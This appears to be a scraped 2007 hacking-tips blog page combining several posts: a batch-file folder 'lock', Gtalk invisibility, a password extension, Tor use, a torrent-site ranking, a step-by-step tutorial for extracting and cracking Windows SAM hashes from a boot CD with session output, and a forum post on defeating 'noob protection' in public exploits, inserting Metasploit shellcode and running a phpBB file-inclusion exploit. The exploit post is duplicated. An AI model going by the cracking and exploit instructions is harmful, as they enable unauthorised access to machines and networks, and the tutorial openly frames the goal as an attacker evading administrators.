Protected windows folder

Change Pass to the pass you want.

@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== Pass here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

Read More

go Invisible on Gtalk

see this vedio

http://www.metacafe.com/watch/1083191/invisible_in_gtalk/

-----------------------------

or follow me

1. Download this software

http://sourceforge.net/project/downloading.php?groupname=psi&filename=psi-0.10-win-setup.exe&use_mirror=jaist

2. Go to account setup

3. click add

4. give any name

5. click add

6. in front of jabber id put your GTALK ID

7. password is your GTALK ID password

8. save

9. click on connection tab

10. check on all checkboxes

11. in host put : talk.google.com

12. right click you profile name

13. Right click on profile name

14. click on XML consol

15. check the box of Enable

16. put this in script field

55

17. click on transmit

18. You are Invisble
how it work

see this also if you have problem

http://psi-im.org/wiki/Google_Talk_HowTo_for_Psi_0.9.3




very simle it just a manipulation by XMPP protocol

XMPP work on IM (gtalk)

Read More

Password Hasher Firefox Extension

Well seen as though we were talking about breaking passwords, here’s a tool for Firefox to help you manage your more secure passwords.

Better security without bursting your brain

Password Hasher is a Firefox security extension for generating site-specific strong passwords from one (or a few) master key(s).

What good security practice demands:

Strong passwords that are hard to guess.
Different passwords at each site.
Periodically changing existing passwords.

Why you probably aren’t practicing good security:

Strong passwords are difficult to remember.
Juggling a multitude of passwords is a pain.
Updating passwords compounds the memorization problem.

How Password Hasher helps:

• Strong passwords are automatically generated.
• The same master key produces different passwords at many sites.
• You can quickly upgrade passwords by “bumping” the site tag.
• You can upgrade the master key without updating all sites at once.
• It supports different length passwords.
• It supports special requirements, such as digit and punctuation characters.
• All data is saved to the browser’s secure password database.

You can download Password Hasher here:

passhash-1.0.5.xpi

Read More

Cracking Syskey and the SAM on Windows XP, 2000 and NT 4

SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has had SysKey enabled by default. The way most folks crack a SAM file on a system that uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN Manager) and NT hashes. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator level account then PWdump is of little use.

Some folks will ask why would you want to crack the passwords in the SAM at all since it’s far easier to just change the Administrator password using a Linux boot disk or Sala’s Password Renew for PE Builder. The reason an attacker may want to crack the local passwords instead of changing them is two fold:

1. An attacker doesn’t want to tip off the system administrators. If they notice that the old local admin password no longer works they will get a little bit suspicious don’t you think? This is somewhatsolved by Sala’s Password Renew since it lets you add new admin level accounts as well as change existing account’s passwords.

2. The same local account passwords may be used on other systems on the network (and most likely are if they use imaging software like Ghost). If the attacker can crack one machine’s admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access (across the network) to.

This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to the Knoppix variant known as the Auditor security collection boot CD [5] (I’m using version 120305-01 in this tutorial). Here are the steps you will need to take in order to audit local passwords using the Auditor CD:

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell’s it’s F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:
mount /dev/hda1

Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating:

Linux Command:

cd /ramdisk/

Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, that’s where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt

Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt

Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:
gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt

Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

john password-hashes.txt -w:eng.txt

John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the –f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

john password-hashes.txt -f:NT -w:eng.txt

If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results:

Linux Command:

john password-hashes.txt -i:all

Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”):

Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1 root@1[~]# cd /ramdisk/ root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt Bkhive ncuomo@studenti.unina.it Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01 root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes .txt Samdump2 ncuomo@studenti.unina.it This product includes cryptographic software written by Eric Young (eay@cryptsoft.com) No password for user Guest(501) No V value! root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt root@1[ramdisk]# john password-hashes.txt -w:eng.txt Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS]) MONKEY (Administrator) guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4]) monkey (Administrator) guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz root@1[ramdisk]#

Mitigating SAM and SysKey Cracking

There are a few things you can do to make it harder for attacker to crack you local passwords. An attacker will most likely have to get into the BIOs to set it to boot from the CD-ROM. Setting up a BIOs password will help keep crackers from using the Auditor CD (or any boot CD) but if they can get into the computer’s case it’s easy to reset a BIOs password so some sort of physical case lock should be used as well. Strong passwords (non-dictionary words with more that just alphanumeric characters) will also make it harder for attackers to crack passwords since they will have to resort to potentially slow brute force methods.

I hope this short tutorial helps, feel free to write me if you have any questions. Some other techniques you may want to look into for faster cracking are cracking clusters [9] and Rainbow tables [10]. Enjoy your hash. :)

Read More

Get IP address anonymity everytime

i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network…….

If u have Mozilla then it works very fine

First Download Vidalia Bundle from here


http://www.torproject.org/download.html.en

Here is link for Windows and MAC OS ……….So download it according to your requirement .

After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here :


https://addons.mozilla.org/en-US/firefox/addon/2275

then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this.

You can check your ip address here

http://www.whatismyip.com/

Read More

Using exploits. Includes noob protection

ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options



in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32





press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post




/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";





you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.



then type the command you want it to execute, then press "generate payload"




PostPosted: Fri Dec 28, 2007 4:46 pm Reply with quoteBack to top
I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or scramble a simple statement so people immediatly know that it shouldnt be that way. This protects against skiddies and noobs from getting and running the exploit. I will show you how to compile exploits with Dev C++ and run perl and php scripts. I will also include the entire remote library from milw0rm compiled in complete.

Downloads: dev c++, perl (win), perl (source), openSSL (win)

WSAStartup
Quote:
[linker error] undefined reference to `WSAStartup@8'
[linker error] undefined reference to `socket@12'

Open dev c++ options

Image

in the main window will be a checkbox that says "Add the following commands when calling the compiler" type this in the box -lwsock32

Image

press ok and compile again.
----

Using Shellcodes
you can generate shellcodes for metasploits projects with ease. here is one i made for this post
Code:
/* win32_exec - EXITFUNC=seh CMD=shutdown -f -s Size=168 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"x31xc9x83xe9xdcxd9xeexd9x74x24xf4x5bx81x73x13xec"
"x94x52x85x83xebxfcxe2xf4x10x7cx16x85xecx94xd9xc0"
"xd0x1fx2ex80x94x95xbdx0exa3x8cxd9xdaxccx95xb9xcc"
"x67xa0xd9x84x02xa5x92x1cx40x10x92xf1xebx55x98x88"
"xedx56xb9x71xd7xc0x76x81x99x71xd9xdaxc8x95xb9xe3"
"x67x98x19x0exb3x88x53x6ex67x88xd9x84x07x1dx0exa1"
"xe8x57x63x45x88x1fx12xb5x69x54x2ax89x67xd4x5ex0e"
"x9cx88xffx0ex84x9cxb9x8cx67x14xe2x85xecx94xd9xed"
"xd0xcbx63x73x8cxc2xdbx7dx6fx54x29xd5x84x64xd8x81"
"xb3xfcxcax7bx66x9ax05x7ax0bxe7x3axf0x98xf0x3dxf2"
"x82xb4x7fxe3xccxb9x21x85";


you can use that code and replace the shellcode in any exploit that uses the shellcode. You can generate new shellcodes here: http://metasploit.com:55555/PAYLOADS First, select the payload you wish to use.

Image

then type the command you want it to execute, then press "generate payload"

Image

your shellcode should be printed out nicely for you.
- - -

Perl Exploits
If your using windows install this msi package. Lets use an example perl script from milw0rm. http://www.milw0rm.com/exploits/3661

save that exploit to your c: drive as a file called "3661.pl". This exploit justs generates an HTML file exploit, "exploit.html". Its that simple. But some exploits require you to have SSL installed. so you can grab that for windows at the top of this post with the other downloads. Some exploits may require you to pass "arguments" to the application, like this epxloit.

uh oh, noob protection?




syntax error at C:2552.pl line 47, near "print"
Execution of C:2552.pl aborted due to compilation errors.





well instantly i see the end of the line $vul=" is on has no ";" at the end of it. Put that in there so it looks like this




$host=$ARGV[0];
$path=$ARGV[1];
$vul="phpbb_security.php?phpbb_root_path=";





now save it and try again. YAY




C:>2552.pl

################################################## ########################
# #
# phpBB Security <= 1.0.1 Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
################################################## ########################

Usage: Ashiyane.pl [host] [path]





EX : Ashiyane.pl www.victim.com /path/

Read More

Most Popular Torrent Sites of 2007

1. Mininova

Without a doubt the most visited BitTorrent site. In November, Mininova reached a milestone by entering the list of the 50 most visited websites on the Internet.

Alexa rank: 46
2. IsoHunt

IsoHunt continued to grow this year. In September they were forced to close their trackers to US traffic because of the issues they have with the MPAA, but this had no effect on the visitor count.

Alexa rank: 143
3. The Pirate Bay

The Pirate Bay has been in the news quite a bit this year and remains not only the most used BitTorrent tracker, but also one of the most visited BitTorrent sites. At the moment they are fighting with IsoHunt for the second place in this list.

Alexa rank: 147
4. Torrentz

Torrentz is the only “torrent site” in the top 10 that doesn’t host .torrent files. Several improvements and new features have been introduced over the past year such as a comment system, private bookmarks and a cleaner layout.

Alexa rank: 160
5. BTjunkie

BTjunkie was one of the fastest risers last year and continued to grow throughout 2007. Last month they were, like many others, forced to leave their ISP (LeaseWeb), but the transition to a new host went smoothly and didn’t result in any downtime.

Alexa rank: 445
6. TorrentSpy

TorrentSpy was the most popular BitTorrent site of 2006, but dropped to sixth place due to legal issues with the MPAA. To ensure the privacy of their users, TorrentSpy decided that it was best to block access to all users from the US, causing their traffic to plunge.

Alexa rank: 461
7. TorrentPortal

Not much news about TorrentPortal this year, but that probably is a good thing. Like most other sites they have grown quite a bit in 2007.

Alexa rank: 481
8. GamesTorrents

It’s quite a surprise to see GamesTorrents in the list of 10 most popular BitTorrent sites of 2007. This Spanish BitTorrent site had a huge dip in traffic earlier this year but managed to secure 8th place.

Alexa rank: 583
9. TorrentReactor

TorrentReactor.net has been around for quite a while, four years to be exact, and is still growing.

Alexa rank: 604
10. BTmon

BTmon was one of the newcomers in 2006, and it is the youngest BitTorrent site in the top 10 this year.

Alexa rank: 673
Honorable Mention: Demonoid

For being one of the most visited BitTorrent sites until they pulled the plug in Novembe

Read More